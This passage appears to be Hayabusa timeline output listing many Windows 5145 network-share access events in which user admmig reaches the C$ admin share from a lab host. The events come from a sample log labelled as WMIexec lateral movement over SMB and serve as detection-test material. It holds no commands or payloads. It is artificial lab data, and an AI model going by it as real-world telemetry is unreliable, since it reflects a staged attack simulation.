\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 
